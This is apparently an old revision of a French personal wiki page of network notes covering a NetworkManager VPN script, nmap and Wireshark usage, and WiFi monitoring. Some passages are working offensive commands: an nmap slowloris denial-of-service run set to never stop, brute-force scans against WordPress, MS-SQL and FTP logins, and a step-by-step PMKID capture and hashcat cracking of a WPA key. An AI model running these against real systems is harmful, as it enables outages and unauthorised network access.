Ceci est une ancienne révision du document !
Table des matières
NetworkManager
Connecter le VPN automatiquement
Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :
- /etc/NetworkManager/dispatcher.d/vpn-up
#! /bin/bash REQUIRED_CONNECTION_NAME="<name-of-connection>" VPN_CONNECTION_NAME="<name-of-vpn-connection>" default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}") vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}") if [ "${default_conn}" -a ! "${vpn_conn}" ]; then nmcli con up id "${VPN_CONNECTION_NAME}" fi
Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.
ATTENTION !! ne pas oublier de le rendre exécutable !!
Nmap
Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.
Scan
Lister les hosts en ligne
nmap -sn 192.168.1.0/24
Scanne toutes les IP en 192.168.1.*
Afficher l'OS (root)
sudo nmap -O 192.168.1.51
Scan détaillé
nmap -A -T4 192.168.1.13
On ajoute -T4 pour une détection plus rapide (4 Threads)
Ports spécifiques (root)
On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :
nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080
Scanner sans résolution DNS (gain de temps)
Ajouter le commutateur -n
Détecter les services et leur version
nmap -sV 192.168.1.0/24
Scanner les ports TCP
nmap -sT 192.168.1.0/24
Scanner les ports UDP (root)
sudo nmap -sU 192.168.1.0/24
Techniques
Détection des CVE/vuln
nmap -Pn --script vuln 192.168.1.1
DOS (non-root)
nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Brute Force
WordPress
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
MS-SQL
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP
nmap --script ftp-brute -p 21 192.168.1.105
Check malwares
Script standard
nmap -sV --script=http-malware-host 192.168.1.105
Script Google
nmap -p80 --script http-google-malware infectedsite.com
Wireshark
Filtres
Expressions
== != <= >= < >
Opérateurs
AND | (ip.src==192.168.2.25) && (ip.dst==74.125.236.16) |
---|---|
OR | (ip.src==192.168.2.25)||(ip.dst==192.168.2.25) |
Filtres
IP Source | ip.src == 192.168.1.10 |
---|---|
IP Destination | ip.dst == 192.168.1.1 |
IP (les deux) | ip.addr == 192.168.1.10 |
IP / Hostnames / DNS
Hostname à partir de l'IP
getent hosts IP
Cela fonctionne aussi bien en LAN que sur des hosts distants.
WIFI
Observer le traffic
Créer une interface moniteur
sudo iw phy phy0 interface add mon0 type monitor
Lister les SSID
airodump-ng mon0
Supprimer une interface moniteur
sudo iw mon0 del
Tester la sécurité d'un réseau
Attention, ceci est à réaliser uniquement sur votre propre box internet. Vous êtes responsables de vos actes.
Installation des paquets nécessaires
Sous Archlinux (utilisation d'un AUR Helper requise)
yay -S hashcat hcxtools hcxdumptool aircrack-ng
Cibler la box
- Déconnecter le réseau wifi
- Lister les interfaces
ip link
- Lancer le moniteur sur l'interface wifi
sudo airmon-ng start wlan0
Une ligne devrait ressembler à ça : (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon). Cela signifie que l'on vient de créer l'interface moniteur wlan0mon.
- Lister les points d'accès
sudo airodump-ng wlan0mon
Une liste des BSSID alentours s'affiche. On peut y voir les noms, les canaux, le type de sécurité, les “beacons” et les adresses macs. Récupérer l'adresse mac du point d'accès que vous souhaitez tester.
On met ensuite l'adresse MAC dans un fichier texte :
echo '001122AABBCC' > mac.txt
Lancement de la capture
sudo hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 enable_status=3
Le programme va lister une partie du traffic, ligne par ligne. Au bout d'un moment (2 à 5 min environ), une ligne [FOUND PMKID] doit apparaitre. Faire immédiatement Ctrl+C après l'apparition de cette ligne.
Décryptage de la clé
- Génération du fichier “hashtocrack”
hcxpcaptool -z hashtocrack hash
- Décryptage du fichier “hashtocrack”
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
- Afficher le mot de passe
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show
Le mot de passe est le dernier bloc de caractères après le 3ème “*”